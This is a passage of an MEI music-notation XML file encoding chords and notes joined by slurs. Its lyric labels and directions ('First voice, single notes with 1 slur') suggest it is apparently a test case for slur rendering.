xml:id=\"verse-L66F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L66F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L66F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L66F3\">note</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L67F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L67F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L67F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L67F1S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L66F1N2-L67F1N1\" staff=\"1\" startid=\"#note-L66F1S1\" endid=\"#note-L67F1S1\" />\r\n                            <slur xml:id=\"slur-L66F1N1-L67F1N2\" staff=\"1\" startid=\"#note-L66F1S2\" endid=\"#note-L67F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L68\" n=\"20\">\r\n                            <staff xml:id=\"staff-L68F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L68F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L69F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L69F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L69F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L69F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L69F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L69F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L69F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L69F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L69F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L69F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L69F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L69F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L69F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L69F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L69F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L69F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L69F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L69F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L69F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L69F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L69F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L69F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L70F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L70F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L70F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L70F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L69F1N2-L70F1N1\" staff=\"1\" startid=\"#note-L69F1S1\" endid=\"#note-L70F1S1\" />\r\n                            <slur xml:id=\"slur-L69F1N1-L70F1N2\" staff=\"1\" startid=\"#note-L69F1S2\" endid=\"#note-L70F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L71\" n=\"21\">\r\n                            <staff xml:id=\"staff-L71F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L71F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L72F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L72F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L72F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L72F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L72F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L72F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L72F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L72F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L72F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L72F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L72F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L72F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L72F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L72F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L72F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L72F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L72F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L72F2\">2</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L72F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L72F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L72F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L72F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L73F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L73F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L73F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L73F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L72F1N2-L73F1N1\" staff=\"1\" startid=\"#note-L72F1S1\" endid=\"#note-L73F1S1\" />\r\n                            <slur xml:id=\"slur-L72F1N1-L73F1N2\" staff=\"1\" startid=\"#note-L72F1S2\" endid=\"#note-L73F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L75\" n=\"22\">\r\n                            <staff xml:id=\"staff-L75F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L75F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L76F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L76F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L76F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L76F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L76F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L76F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L76F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L76F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L76F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L76F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L76F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L76F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L76F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L76F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L76F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L76F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L76F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L76F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L76F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L76F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L76F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L76F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L77F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L77F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L77F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L77F1S3\" oct=\"4\" pname=\"a\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L76F1N3-L77F1N1\" staff=\"1\" startid=\"#note-L76F1S1\" endid=\"#note-L77F1S1\" />\r\n                            <slur xml:id=\"slur-L76F1N2-L77F1N2\" staff=\"1\" startid=\"#note-L76F1S3\" endid=\"#note-L77F1S3\" />\r\n                            <slur xml:id=\"slur-L76F1N1-L77F1N3\" staff=\"1\" startid=\"#note-L76F1S2\" endid=\"#note-L77F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L78\" n=\"23\">\r\n                            <staff xml:id=\"staff-L78F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L78F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L79F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L79F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L79F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L79F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L79F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L79F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L79F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L79F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L79F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L79F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L79F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L79F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L79F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L79F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L79F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L79F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L79F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L79F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L79F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L79F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L79F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L79F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L80F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L80F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L80F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L80F1S3\" oct=\"5\" pname=\"c\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L79F1N3-L80F1N1\" staff=\"1\" startid=\"#note-L79F1S3\" endid=\"#note-L80F1S3\" />\r\n                            <slur xml:id=\"slur-L79F1N2-L80F1N2\" staff=\"1\" startid=\"#note-L79F1S1\" endid=\"#note-L80F1S1\" />\r\n                            <slur xml:id=\"slur-L79F1N1-L80F1N3\" staff=\"1\" startid=\"#note-L79F1S2\" endid=\"#note-L80F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L81\" n=\"24\">\r\n                            <staff xml:id=\"staff-L81F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L81F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L82F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L82F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L82F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L82F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L82F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L82F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L82F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L82F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L82F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L82F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L82F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L82F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L82F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L82F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L82F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L82F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L82F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L82F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L82F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L82F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L82F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L82F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L83F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L83F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L83F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L83F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L82F1N3-L83F1N1\" staff=\"1\" startid=\"#note-L82F1S3\" endid=\"#note-L83F1S1\" />\r\n                            <slur xml:id=\"slur-L82F1N2-L83F1N2\" staff=\"1\" startid=\"#note-L82F1S1\" endid=\"#note-L83F1S3\" />\r\n                            <slur xml:id=\"slur-L82F1N1-L83F1N3\" staff=\"1\" startid=\"#note-L82F1S2\" endid=\"#note-L83F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L84\" right=\"end\" n=\"25\">\r\n                            <staff xml:id=\"staff-L84F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L84F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L85F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L85F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L85F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L85F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L85F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L85F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L85F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L85F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L85F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L85F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L85F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L85F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L85F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L85F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L85F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L85F1S3\" oct=\"4\" pname=\"g\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L85F2\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L85F2\">3</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L85F3\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L85F3\">note</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L85F4\" color=\"#ddd\" n=\"3\">\r\n                                                <syl xml:id=\"syl-L85F4\">overlap</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L86F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L86F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L86F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L86F1S3\" oct=\"5\" pname=\"d\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L85F1N3-L86F1N1\" staff=\"1\" startid=\"#note-L85F1S1\" endid=\"#note-L86F1S3\" />\r\n                            <slur xml:id=\"slur-L85F1N2-L86F1N2\" staff=\"1\" startid=\"#note-L85F1S3\" endid=\"#note-L86F1S1\" />\r\n                            <slur xml:id=\"slur-L85F1N1-L86F1N3\" staff=\"1\" startid=\"#note-L85F1S2\" endid=\"#note-L86F1S2\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L88\">\r\n                            <staff xml:id=\"staff-L88F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L88F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L92F1\" dur=\"2\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L92F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L92F3\">slurs:</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L92F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L92F4\">attachment:</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L92F5\" color=\"#ddd\" n=\"3\">\r\n                                            <syl xml:id=\"syl-L92F5\">comments:</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L93F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L93F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L93F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L93F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L93F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L94F1\" dur=\"4\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L92F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L92F2\" dur=\"1\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L92F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000483734998\" fontstyle=\"normal\">First voice, single notes with 1 slur</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L93F1-L94F1N1\" staff=\"1\" startid=\"#note-L93F1\" endid=\"#note-L94F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L95\" n=\"26\">\r\n                            <staff xml:id=\"staff-L95F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L95F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L96F1\" dur=\"4\" oct=\"5\" pname=\"a\" stem.len=\"5.500000\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L96F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L96F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L96F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L96F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L97F1\" dur=\"4\" oct=\"5\" pname=\"g\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L95F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L96F2\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L96F1-L97F1N1\" staff=\"1\" startid=\"#note-L96F1\" endid=\"#note-L97F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L98\" n=\"27\">\r\n                            <staff xml:id=\"staff-L98F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L98F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L99F1\" dur=\"4\" oct=\"5\" pname=\"a\" stem.len=\"5.500000\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L99F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L99F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L99F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L99F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L100F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L98F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L99F2\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L99F1-L100F1N1\" staff=\"1\" startid=\"#note-L99F1\" endid=\"#note-L100F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L101\" right=\"dbl\" n=\"28\">\r\n                            <staff xml:id=\"staff-L101F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L101F1N1\" n=\"1\">\r\n                                    <note xml:id=\"note-L102F1\" dur=\"4\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                        <verse xml:id=\"verse-L102F3\" color=\"#ccc\" n=\"1\">\r\n                                            <syl xml:id=\"syl-L102F3\">1</syl>\r\n                                        </verse>\r\n                                        <verse xml:id=\"verse-L102F4\" color=\"#aaa\" n=\"2\">\r\n                                            <syl xml:id=\"syl-L102F4\">note</syl>\r\n                                        </verse>\r\n                                    </note>\r\n                                    <note xml:id=\"note-L103F1\" dur=\"4\" oct=\"5\" pname=\"a\" stem.len=\"5.500000\" accid.ges=\"n\" />\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L101F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L102F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L102F1-L103F1N1\" staff=\"1\" startid=\"#note-L102F1\" endid=\"#note-L103F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L104\" n=\"29\">\r\n                            <staff xml:id=\"staff-L104F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L104F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L108F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L108F1S1\" oct=\"4\" pname=\"c\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L108F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L108F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L108F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L108F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L108F1S2\" oct=\"4\" pname=\"e\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L108F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L108F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L108F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L108F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L109F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L109F1S1\" oct=\"4\" pname=\"d\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L109F1S2\" oct=\"4\" pname=\"f\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L104F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L108F2\" dur=\"2\" ploc=\"f\" oloc=\"3\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <dir xml:id=\"dir-L108F1\" place=\"above\" staff=\"1\" tstamp=\"1.000000\">\r\n                                <rend xml:id=\"rend-0000000591359994\" fontstyle=\"normal\">First voice, two-note chords with 1 and 2 slurs</rend>\r\n                            </dir>\r\n                            <slur xml:id=\"slur-L108F1-L109F1N1\" staff=\"1\" startid=\"#chord-L108F1\" endid=\"#chord-L109F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L110\" n=\"30\">\r\n                            <staff xml:id=\"staff-L110F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L110F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L111F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L111F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L111F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L111F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L111F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L111F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                        <note xml:id=\"note-L111F1S2\" oct=\"5\" pname=\"f\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L111F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl xml:id=\"syl-L111F3\">1</syl>\r\n                                            </verse>\r\n                                            <verse xml:id=\"verse-L111F4\" color=\"#aaa\" n=\"2\">\r\n                                                <syl xml:id=\"syl-L111F4\">chord</syl>\r\n                                            </verse>\r\n                                        </note>\r\n                                    </chord>\r\n                                    <chord xml:id=\"chord-L112F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L112F1S1\" oct=\"5\" pname=\"g\" accid.ges=\"n\" />\r\n                                        <note xml:id=\"note-L112F1S2\" oct=\"5\" pname=\"e\" accid.ges=\"n\" />\r\n                                    </chord>\r\n                                </layer>\r\n                                <layer xml:id=\"layer-L110F2N2\" n=\"2\">\r\n                                    <rest xml:id=\"rest-L111F2\" dur=\"2\" ploc=\"b\" oloc=\"4\" />\r\n                                </layer>\r\n                            </staff>\r\n                            <slur xml:id=\"slur-L111F1-L112F1N1\" staff=\"1\" startid=\"#chord-L111F1\" endid=\"#chord-L112F1\" />\r\n                        </measure>\r\n                        <measure xml:id=\"measure-L113\" n=\"31\">\r\n                            <staff xml:id=\"staff-L113F1N1\" n=\"1\">\r\n                                <layer xml:id=\"layer-L113F1N1\" n=\"1\">\r\n                                    <chord xml:id=\"chord-L114F1\" dur=\"4\">\r\n                                        <note xml:id=\"note-L114F1S1\" oct=\"5\" pname=\"a\" accid.ges=\"n\">\r\n                                            <verse xml:id=\"verse-L114F3\" color=\"#ccc\" n=\"1\">\r\n                                                <syl 